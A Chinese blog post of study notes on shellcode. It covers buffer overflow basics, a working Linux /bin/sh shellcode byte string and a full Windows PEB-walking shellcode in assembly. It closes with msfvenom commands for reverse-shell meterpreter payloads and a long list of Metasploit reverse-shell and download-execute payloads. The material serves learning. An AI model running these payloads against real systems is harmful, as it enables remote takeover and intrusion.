【网络资源学习笔记】ShellCode相关内容学习

今宵孤枕冷难眠

已于 2023-06-25 14:31:48 修改

阅读量2.5k

点赞数 5

文章标签：学习

于 2022-07-14 18:30:49 首次发布

本文链接：https://blog.csdn.net/m0_38036918/article/details/125790416

版权

什么是Shellcode

简答来说，Shellcode是一段利用软件漏洞执行的代码，一般为16进制的机器码。当寄存器溢出后，CPU执行了Shellcode的机器码，从而完成了某些效果的实现或代码执行。

本文主要是分为两部分：Shellcode的生成、常用安全工具的Shellcode分析

基础知识

X86、X86_64、ARM常用汇编指令集及相关汇编基础知识

计算机真正能够理解的是低级语言，它专门用来控制硬件。汇编语言就是低级语言，直接描述/控制 CPU 的运行。如果你想了解 CPU 到底干了些什么，以及代码的运行步骤，就一定要学习汇编语言。

我们知道，CPU只负责计算，本身不具备智能。你输入一条指令，它就运行一次，然后停下来，等待下一条指令。

这些指令都是二进制的，称为操作码（opcode），比如加法指令就是00000011。编译器的作用，就是将高级语言写好的程序，翻译成一条条操作码。

对于人类来说，二进制程序是不可读的，根本看不出来机器干了什么。为了解决可读性的问题，以及偶尔的编辑需求，就诞生了汇编语言。

每一种 CPU 的机器指令都是不一样的，因此对应的汇编语言也不一样。首先，需要明确X86、X86_64、arm64等指的是CPU的指令集。大致分类如下：

×86架构：指令集丰富，性能强。我们目前在桌面电脑，笔记本电脑中使用的Intel、AMD处理器，就是X86处理器。

×86（又称：i386…/ IA32）表示32位cpu位数
×64（又称：×86-64 / amd64 / inter64）表示64位cpu位数

arm架构：ARM指令集少，电路规模小，功耗低，发热低，非常适合于嵌入式、便携式电子产品，如手机、平板，以及工业嵌入式。

arm / A32 / arm32（AArch32）：32 位固定长度指令集
A64 / arm64（AArch64）：32 位固定长度指令集

寄存器

一般说法中，CPU由寄存器、控制器、运算器组成。其功能如下：

寄存器：寄存器用来暂存指令，数据等处理对象，可以看作是内存的一种。
控制器：负责把内存上的指令，数据等读入寄存器，并根据指令的执行结果来控制整个计算机。
运算器：负责运算从内存读入寄存器的数据。

从其功能可看到出，寄存器的重要性。故而各个构架下的汇编语言学习都是以寄存器的处理为核心，进行知识展开。

补充：

CPU除了上面得三部分内容，还有一个时钟的内容。

时钟：负责发出CPU开始计时的时钟信号。不过，也有些计算机的时钟位于CPU的外部。时钟信号以Hz(赫兹为单位)，代表每秒的频率，时钟信号的频率越高，CPU的运行速度越快。

寄存器分类如下：

CPU中数据存储

堆

程序运行的时候，操作系统会给它分配一段内存，用来储存程序和运行产生的数据。这段内存有起始地址和结束地址，比如从0x1000到0x8000，起始地址是较小的那个地址，结束地址是较大的那个地址。

程序运行过程中，对于动态的内存占用请求（比如新建对象，或者使用malloc命令），系统就会从预先分配好的那段内存之中，划出一部分给用户，具体规则是从起始地址开始划分（实际上，起始地址会有一段静态数据，这里忽略）。举例来说，用户要求得到10个字节内存，那么从起始地址0x1000开始给他分配，一直分配到地址0x100A，如果再要求得到22个字节，那么就分配到0x1020。

栈

简单说，栈是由于函数运行而临时占用的内存区域。由内存区域的结束地址开始，从高位（地址）向低位（地址）分配。

int main() {
   int a = 2;
   int b = 3;
}

系统开始执行上述代码的main函数时，会为它在内存里面建立一个帧（frame），所有main的内部变量（比如a和b）都保存在这个帧里面。main函数执行结束后，该帧就会被回收，释放所有的内部变量，不再占用空间。

int main() {
   int a = 2;
   int b = 3;
   return add_a_and_b(a, b);
}

上面代码中，main函数内部调用了add_a_and_b函数。执行到这一行的时候，系统也会为add_a_and_b新建一个帧，用来储存它的内部变量。也就是说，此时同时存在两个帧：main和add_a_and_b。一般来说，调用栈有多少层，就有多少帧。

等到add_a_and_b运行结束，它的帧就会被回收，系统会回到函数main刚才中断执行的地方，继续往下执行。通过这种机制，就实现了函数的层层调用，并且每一层都能使用自己的本地变量。

简单总结一下：

栈：由系统分配，一般存放函数参数值、局部变量的值等。

堆：一般由程序员申请并指明大小，最后也由程序员释放，如不回收则在程序执行结束后由OS回收。

基础汇编指令

百度一下

C语言基础

格式化字符串漏洞、格式化输出漏洞

缓冲区溢出

编译环境为docker下的ubuntu环境

堆溢出

堆溢出，简单理解就是给堆里面的变量赋予超过了其分配的空间值大小，堆链表的后续链表数据会被覆盖所导致的。堆内存一般通过malloc()分配，malloc只管分配内存，并不能对所得的内存进行初始化，所以得到的一片新内存中，其值将是随机的。通过free()释放。

通过最简单的gets举个例子，这部分网络介绍比较丰富，有疑问的地方也方便自己找教程。

编译过程中，gcc会进行报错提示gets函数危险建议进行替换，不用管它。

程序执行效果：

这个时候，回顾一下代码，我们通过malloc申请的空间大小为10字节，但实际是16字节的。然后，通过堆溢出的概念我们可知道，当输入超出申请空间的内容会覆盖掉紧邻的堆的内容，即当在job内容输入过长的内容会覆盖掉name空间的内容，执行下：

发现当前软件的堆溢出被成功触发，用gdb跟一下程度的执行效果。

断点1：gets(job)

这里我可以发现针对jobs接受空间为10，但gets可接受字节数为16。

断点2：printf(“your name is %s\n”,name)

程序正常执行，再进一步步出后，成功输出了“your name is swallow”。我们来看一下超出申请空间的效果。

通过上述断点的分析，我们可以看当输入过长的时候原本0xaaaaddbf92c0的内容被覆盖。继续执行：

因为输出函数也会占用一定的空间，溢出会持续向下会捕获到数据的相关字符加入溢出字符，导致输出结果变为：

栈溢出

理解了上述的堆溢出，对栈溢出的理解会简单些，但两者的区别是栈的大小是由系统进行分配的。

我们先写一个strcpy引发栈溢出的简单例子（因为GCC的编译保护，直接上GDB分析）：

首先，先编译运行下正常的软件：

断点：printf(“%s\n”,output);

通过上述断点和运行结果，我们可以看出系统从0xaaaadd260660分配了52的空间给我们来完成整个程序的执行。那我们给strcpy操作的字符长一点，使其超出output的长度。

同样的断点：

这个地方因为gcc的编译保护，并没爆出异常，但通过xffffc9b48698的位置，可查看到相关的栈顶已经被破坏。直接看程序执行结束的栈信息：

查看最终的栈信息，我们可发现栈顶位置发生了改变。正常使用gcc进行编译的时候，也会有提示：

将上述步骤在VM Ubuntu环境下进行编译运行，结果如下：

为减少不必要的因素产生的影响，建议使用真实环境的内容。

Shellcode编写

Linux平台

此部分代码是在Ubuntu平台下完成，原因：mac下32位的C语言类库已经没有了，而相关汇编的关联需要32位库。且64位框架兼容32位，不想有太多有的没的问题，选Ubuntu简单直接。

一般编写思路为通过一个int 0x80系统调用，指定想调用的函数的系统调用号，传入调用函数的参数。

编写C/C++代码

首先，我们先编写C/C++代码实现下获取Linux下shell

编译运行下

编写汇编代码

Shellcode简单来说，其实是获取相关汇编代码执行过程中产生的16进制机器码。本节需将上节C/C++代码转换为汇编代码，代码转换结果如下：

获取机器码

通过上图几步骤，我们即可获取32位即X86平台下的执行的机器码。

\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80

后续我们即可将获取的机器码，应用到我们发现的缓冲区溢出的漏洞利用或其他代码中，例如：

编译运行,提示需要root权限。

gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c

详细解释：
GCC编译器有一种栈保护机制来阻止缓冲区溢出，所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制；
-z execstack 用于允许执行栈；
-m32 -g 在64位的机器上产生32位汇编。

报错：/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory

解决方式：sudo apt install gcc-multilib

原因：这是由于缺少相应的32位库文件导致的。

其他内容

当PUSH内容时，asm脚本内容下：

获取机器码如下，在Linux系统中遇到00会停止运行。导致我们获取的到的shellcode无法正常执行。在Linux中"//“和”/"作用相似，当采用双斜杠是刚好帮我们补齐了内容位置，使得代码可正常执行。

Int 0X80中断原理

第一步，就是须要将系统调用号加入到eax中。
第二步，ebx保存函数调用的第一个参数，ecx、edx、esi、edi分别对应这2345个参数。
若是参数超过5个，就必须将参数数组存储在内存中，并且必须将该数组的地址放在ebx中。
一旦加载寄存器后，就会调用int 0x80 汇编指令来中断，强迫内核暂停手头上的工做并处理该中断，从而使得系统调用syscall。

Windows平台

在Windows下，没有int 0x80系统调用功能来寻找函数，但也有像syscall这样的系统调用。Windows相对liunx下会麻烦些，针对相关加载需要一定的dll入口进行辅助调用，这个时候需要我们对利用dll的相关信息进行获取。

编写C/C++代码

在Windows下启动vc++ 6.0 编写并运行代码，效果如下：

代码中，我通过system成功执行了dir命令，并显示了相关的命令执行的结果

编写汇编代码

根据上面Linux的经验，这一步我们来编写Windows下shellcode生成的汇编代码，效仿Linux进行编写，效果如下：

我们发现这个地方我们的传入的dir字符串仅仅是完成了入栈的过程，并没有没有被system所执行。此处就是Windows和Linux下的一个比较大的区别，即我们在编写汇编代码是需要获取到系统执行命令的相关内存地址的。

获取相关内存地址

获取system的内存执行地址，由于Windows的ASLR的原因，同一个函数在每一台机器上的内存地址是不一样的。编写简易代码进行内存地址的获取，其执行结果如下：

重新编写汇编代码

上述思路告诉我们在本地上编写shellcode的一个思路：获取相关函数的地址，压入相关数据并进行执行。后面机器码的获取，我们通过VC++的debug即可进行相关内容获取。但我们重新完善上述的汇编代码生成的shellcode仅具备单一性，不具备一定的通用性，故我们在这一节重新编写具备通用性、独立性的汇编代码。

在这一节，踩了很多很多的坑，大部分是环境的问题。尝试许久之后，还是偷懒换成了xp SP3系统下使用vc++，Windows下shellcode前面的内容是在Windows7下完成，此节在Windows7下编译运行会报错：

因为这一节涉及内容很长，就先看一下实际的运行效果吧！

接下来，我们开始讲一下整个的代码的流程

1.找到kernel32.dll被加载到内存中

我们要调用一个函数，必须要知道其地址，而我们在调用函数时又必须要载入链接库，那么我们就必须要知道LoadLibrary()函数地址，获取地址需要函数GetProcAddress()，而GetProcAddress()函数在“kernel32.dll”的里面。所以，我们在寻找地址时，需要用到这么几个关键字“kernel32.dll”、”GetProcAddress()”、”LoadLibrary()”。

正如我们在前面讲的的那样，为了生成可靠的shellcode代码，我们需要遵循一些步骤。我们知道要调用什么函数，但是首先，我们必须找到这些函数，在前面已经讨论了怎么调用函数地址的步骤。

我们可以利用PEB结构找到kernel32.dll。使用以下代码将dll库加载到内存中

xor ecx, ecx
mov eax, fs:[ecx + 0x30]        ; EAX = PEB
mov eax, [eax + 0xc]            ; EAX = PEB->Ldr
mov esi, [eax + 0x14]           ; ESI = PEB->Ldr.InMemOrder
lodsd                           ; EAX = Second module
xchg eax, esi                   ; EAX = ESI, ESI = EAX
lodsd                           ; EAX = Third(kernel32)
mov ebx, [eax + 0x10]           ; EBX = Base address

2.找到其导出表

我们在内存中找到kernel32.dll。现在我们需要解析这个PE文件并找到导出表。

mov edx, [ebx + 0x3c]           ; EDX = DOS->e_lfanew
add edx, ebx                    ; EDX = PE Header
mov edx, [edx + 0x78]           ; EDX = Offset export table
add edx, ebx                    ; EDX = Export table
mov esi, [edx + 0x20]           ; ESI = Offset names table
add esi, ebx                    ; ESI = Names table
xor ecx, ecx                    ; EXC = 0

3.找到由kernel32.dll导出的GetProcAddress函数

我们现在在“AddressOfNames”上，一个指针数组(kernel32.dll的地址被加载到内存中。因此，每个4字节将表示一个指向函数名的指针。我们可以通过循环查找完整的函数名，函数名序号(GetProcAddress函数的“number”)如下:

;循环查找GetProcAddress函数
Get_Function:
        inc ecx                                          ; Increment the ordinal
        lodsd                                            ; Get name offset
        add eax, ebx                                     ; Get function name
        cmp dword ptr[eax], 0x50746547                   ; GetP
        jnz Get_Function
        cmp dword ptr[eax + 0x4], 0x41636f72             ; rocA
        jnz Get_Function
        cmp dword ptr[eax + 0x8], 0x65726464             ; ddre
        jnz Get_Function

4.使用GetProcAddress查找LoadLibrary函数的地址

此时，我们只找到了GetProcAddress函数的序号，但是我们可以使用它来查找其他函数的实际地址:

mov esi, [edx + 0x24]              ; ESI = Offset ordinals
add esi, ebx                       ; ESI = Ordinals table
mov cx, [esi + ecx * 2]            ; CX = Number of function
dec ecx
mov esi, [edx + 0x1c]              ; ESI = Offset address table
add esi, ebx                       ; ESI = Address table
mov edx, [esi + ecx * 4]           ; EDX = Pointer(offset)
add edx, ebx                       ; EDX = GetProcAddress

5.使用LoadLibrary来加载动态链接库

利用GetProcAddress()函数，我们可以找到LoadLibraryA()函数的地址。在实际中是没有LoadLibrary()这个地址的，LoadLibraryA()就等价于LoadLibrary()。

xor ecx, ecx            ; ECX = 0
push ebx                ; Kernel32 base address
push edx                ; GetProcAddress
push ecx                ; 0
push 0x41797261         ; aryA
push 0x7262694c         ; Libr
push 0x64616f4c         ; Load
push esp                ; “LoadLibraryA”
push ebx                ; Kernel32 base address
call edx                ; GetProcAddress(LL)

到这一步为止，我们已经完成了大部分Windows下调用的通用思路，下来就是个性目标函数的寻找。有了GetProcAddress()函数，我们就可以寻找任何函数的地址了。

6.在动态链接库中找到函数的地址

我们之前找到了LoadLibrary函数地址，现在我们将使用它来加载到内存中“msvcrt.dll”。包含我们的system函数的库。
这里有个问题是 “msvcrt.dll”的字符串长度为10个字符，不足12个字节，所以在剩余的2个字节我们用低位寄存器cx来存储（用什么寄存器不重要），cx是ecx寄存器的一半，ecx是32位寄存器，ecx存储高16位数据，cx存储低16位数据，这样可以避免产生坏字符。

add esp, 0xc                ; pop “LoadLibraryA”
pop  ecx                    ; ECX = 0
push eax                    ; EAX = LoadLibraryA
push ecx                    ; 6d737663   72742e64 6c6c 
mov  cx, 0x6c6c             ; ll
push ecx
push 0x642e7472             ; rt.d
push 0x6376736d             ; msvc
push esp                    ; “msvcrt.dll”
call eax                    ; LoadLibrary(“msvcrt.dll”)

在编写过程中，我们可以把msvcrt.dll修改为任意DLL文件,但要注意字节数。

7.调用函数

我们加载了msvcrt.dll库，现在我们想调用GetProcAddress来获取system函数的地址。
这里呢，还是为了不产生坏字符，所以把字符串补够了4字节，然后删除。当然，我们也可以用低16位寄存器来存储，像上文那样。
在这个地方，因为上面我们用了16 位寄存器，所以我们下面恢复的字节就要比完整的32位寄存器字节数少一半。

add esp, 0x10                   ; Clean stack
mov edx, [esp + 0x4]            ; EDX = GetProcAddress
xor ecx, ecx                    ; ECX = 0
push ecx                        ;73797374 656d
mov  ecx,0x61626d65             ;emba
push ecx
sub dword ptr[esp + 0x3], 0x61  ; Remove “a”
sub dword ptr[esp + 0x2], 0x62  ; Remove “b”
push 0x74737973                 ; syst
push esp                        ; system
push eax                        ; msvcrt.dll address
call edx                        ; GetProc(system)

这个地方直接就可用前文所写的代码了，直接套用进框架就行，前提是要确保堆栈平衡。

add esp, 0x10                   ; Cleanup stack
push ebp
mov  ebp,esp
sub  esp,0x4                    ; 准备空间
xor  esi,esi
mov  esi,0x00726964             ; dir
mov  dword ptr[ebp-04h],esi
lea  esi, [ebp-04h]
push esi
call eax                        ; system("dir")

add esp, 0x8                    ; Clean stack
pop esi

8.查找ExitProcess函数的地址

我们完成了整个函数的执行，为了不爆出错误，我们必须完美的退出这个程序，所以我们需要在kernel32.dll中找到ExitProcess函数。

;退出程序
pop edx                         ; GetProcAddress
pop ebx                         ; kernel32.dll base address
mov ecx, 0x61737365             ; essa
push ecx
sub dword ptr [esp + 0x3], 0x61 ; Remove “a”
push 0x636f7250                 ; Proc
push 0x74697845                 ; Exit
push esp
push ebx                        ; kernel32.dll base address
call edx                        ; GetProc(Exec)

9.调用ExitProcess函数

最后，我们调用ExitProcess函数:“ExitProcess(0)”。

xor ecx, ecx                   ; ECX = 0
push ecx                       ; Return code = 0
call eax                       ; ExitProcess

补充

vc++查看机器码

进入调试功能后，在查看中进行调试窗口选择，操作如图：

随后，右键菜单选择，圈红的选项。

这个时候，我们就可以看到相关代码对应的机器码了。

完整的代码

void main()
{
    _asm
    {
        xor ecx, ecx
        mov eax, fs:[ecx + 0x30] ; EAX = PEB
        mov eax, [eax + 0xc]     ; EAX = PEB->Ldr
        mov esi, [eax + 0x14]    ; ESI = PEB->Ldr.InMemOrder
        lodsd                    ; EAX = Second module
        xchg eax, esi            ; EAX = ESI, ESI = EAX
        lodsd                    ; EAX = Third(kernel32)
        mov ebx, [eax + 0x10]    ; EBX = Base address
        mov edx, [ebx + 0x3c]    ; EDX = DOS->e_lfanew
        add edx, ebx             ; EDX = PE Header
        mov edx, [edx + 0x78]    ; EDX = Offset export table
        add edx, ebx             ; EDX = Export table
        mov esi, [edx + 0x20]    ; ESI = Offset namestable
        add esi, ebx             ; ESI = Names table
        xor ecx, ecx             ; EXC = 0

    Get_Function:
        inc ecx                              ; Increment the ordinal
        lodsd                                ; Get name offset
        add eax, ebx                         ; Get function name
        cmp dword ptr[eax], 0x50746547       ; GetP
        jnz Get_Function
        cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
        jnz Get_Function
        cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
        jnz Get_Function
        mov esi, [edx + 0x24]                ; ESI = Offset ordinals
        add esi, ebx                         ; ESI = Ordinals table
        mov cx, [esi + ecx * 2]              ; Number of function
        dec ecx
        mov esi, [edx + 0x1c]                ; Offset address table
        add esi, ebx                         ; ESI = Address table
        mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
        add edx, ebx                         ; EDX = GetProcAddress

        xor ecx, ecx    ; ECX = 0
        push ebx        ; Kernel32 base address
        push edx        ; GetProcAddress
        push ecx        ; 0
        push 0x41797261 ; aryA
        push 0x7262694c ; Libr
        push 0x64616f4c ; Load
        push esp        ; "LoadLibrary"
        push ebx        ; Kernel32 base address
        call edx        ; GetProcAddress(LL)

        add esp, 0xc    ; pop "LoadLibrary"
        pop ecx         ; ECX = 0
        push eax        ; EAX = LoadLibrary
        push ecx
        mov cx, 0x6c6c  ; ll
        push ecx
        push 0x642e7472 ; rt.d
        push 0x6376736d ; msvc
        push esp        ; "msvcrt.dll"
        call eax        ; LoadLibrary("msvcrt.dll")

        ;system内存地址
        add esp, 0x10                       ; Clean stack
        mov edx, [esp + 0x4]                ; EDX = GetProcAddress
        xor ecx, ecx                        ; ECX = 0
        push ecx                            ; 73797374 656d
        mov  ecx,0x61626d65                 ; emba
        push ecx
        sub dword ptr[esp + 0x3], 0x61      ; Remove “a”
        sub dword ptr[esp + 0x2], 0x62      ; Remove “b”
        push 0x74737973                     ; syst
        push esp                            ; system
        push eax                            ; msvcrt.dll address
        call edx                            ; GetProc(system)

        add esp, 0x10         ; Cleanup stack
        ;执行核心程序
        push ebp
        mov  ebp,esp
        sub  esp,0x4
        xor  esi,esi
        mov  esi,0x00726964             ;dir
        mov  dword ptr[ebp-04h],esi
        lea  esi, [ebp-04h]
        push esi
        call eax    

        ;堆栈平衡
        add esp,0x8  ;恢复esp
        pop esi

        ;退出程序
        pop edx                         ; GetProcAddress
        pop ebx                         ; kernel32.dll base address
        mov ecx, 0x61737365             ; essa
        push ecx
        sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
        push 0x636f7250                 ; Proc
        push 0x74697845                 ; Exit
        push esp
        push ebx                        ; kernel32.dll base address
        call edx                        ; GetProc(Exec)
        xor ecx, ecx                    ; ECX = 0
        push ecx                        ; Return code = 0
        call eax                        ; ExitProcess
    }
}

shellcode框架

xor ecx, ecx
  mov eax, fs:[ecx + 0x30] ; EAX = PEB
  mov eax, [eax + 0xc]     ; EAX = PEB->Ldr
  mov esi, [eax + 0x14]    ; ESI = PEB->Ldr.InMemOrder
  lodsd                    ; EAX = Second module
  xchg eax, esi            ; EAX = ESI, ESI = EAX
  lodsd                    ; EAX = Third(kernel32)
  mov ebx, [eax + 0x10]    ; EBX = Base address
  mov edx, [ebx + 0x3c]    ; EDX = DOS->e_lfanew
  add edx, ebx             ; EDX = PE Header
  mov edx, [edx + 0x78]    ; EDX = Offset export table
  add edx, ebx             ; EDX = Export table
  mov esi, [edx + 0x20]    ; ESI = Offset namestable
  add esi, ebx             ; ESI = Names table
  xor ecx, ecx             ; EXC = 0

Get_Function:
  inc ecx                              ; Increment the ordinal
  lodsd                                ; Get name offset
  add eax, ebx                         ; Get function name
  cmp dword ptr[eax], 0x50746547       ; GetP
  jnz Get_Function
  cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
  jnz Get_Function
  cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
  jnz Get_Function
  mov esi, [edx + 0x24]                ; ESI = Offset ordinals
  add esi, ebx                         ; ESI = Ordinals table
  mov cx, [esi + ecx * 2]              ; Number of function
  dec ecx
  mov esi, [edx + 0x1c]                ; Offset address table
  add esi, ebx                         ; ESI = Address table
  mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
  add edx, ebx                         ; EDX = GetProcAddress

  xor ecx, ecx    ; ECX = 0
  push ebx        ; Kernel32 base address
  push edx        ; GetProcAddress
  push ecx        ; 0
  push 0x41797261 ; aryA
  push 0x7262694c ; Libr
  push 0x64616f4c ; Load
  push esp        ; "LoadLibrary"
  push ebx        ; Kernel32 base address
  call edx        ; GetProcAddress(LL)

  add esp, 0xc    ; pop "LoadLibrary"
  pop ecx         ; ECX = 0
  push eax        ; EAX = LoadLibrary
  ;DLL文件字符串
  ;push 0xffffffff
  push esp        ; "xxx.dll"
  call eax        ; LoadLibrary("msvcrt.dll")

  ;查找函数内存地址
  add esp, 0xff                     ; Clean stack
  mov edx, [esp + 0x4]              ; EDX = GetProcAddress
  ;函数字符串
  ;push 0xffffffff
  push esp                              ; xxx函数
  push eax                              ; xxx.dll address
  call edx                              ; GetProc(xxx函数)

  add esp, 0xff         ; Cleanup stack
  ;执行核心程序
  ;需执行的Shellcode利用程序

  ;堆栈平衡
  add esp,0xff  ;恢复esp

  ;退出程序
  pop edx                         ; GetProcAddress
  pop ebx                         ; kernel32.dll base address
  mov ecx, 0x61737365             ; essa
  push ecx
  sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
  push 0x636f7250                 ; Proc
  push 0x74697845                 ; Exit
  push esp
  push ebx                        ; kernel32.dll base address
  call edx                        ; GetProc(Exec)
  xor ecx, ecx                    ; ECX = 0
  push ecx                        ; Return code = 0
  call eax                        ; ExitProcess

常用安全工具Shellcode

MSF Shellcode生成方式

生成shellcode

windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口-f c

linux:msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac:msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

其他可供选择的Payloads:(*可关注下带exec关键字的payload)

root@localhost:~# msfvenom -l payloads

Name Description

aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x64/exec Execute an arbitrary command
bsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6
bsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
bsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell
bsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6
bsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6
bsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
bsd/x86/shell/find_tag Spawn a command shell (staged). Use an established connection
bsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6
bsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
bsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
bsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn’t usually installed by default.
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell via GNU AWK
cmd/unix/reverse_bash Creates an interactive shell via bash’s builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
cmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mknod and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the ‘-z’ option included on some systems to encrypt using SSL.
cmd/unix/reverse_lua Creates an interactive shell via Lua
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat
cmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs
cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
cmd/unix/reverse_python Connect back and create a command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via “-z” option
cmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn’t usually installed by default.
cmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.
cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
cmd/windows/generic Executes the supplied command
cmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection
cmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection
cmd/windows/reverse_lua Creates an interactive shell via Lua
cmd/windows/reverse_perl Creates an interactive shell via perl
cmd/windows/reverse_powershell Connect back and create a command shell via Powershell
cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
firefox/exec This module runs a shell command on the target OS withough touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript “launcher” to disk that hides the prompt.
firefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox’s XPCOM API
firefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox’s XPCOM API
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
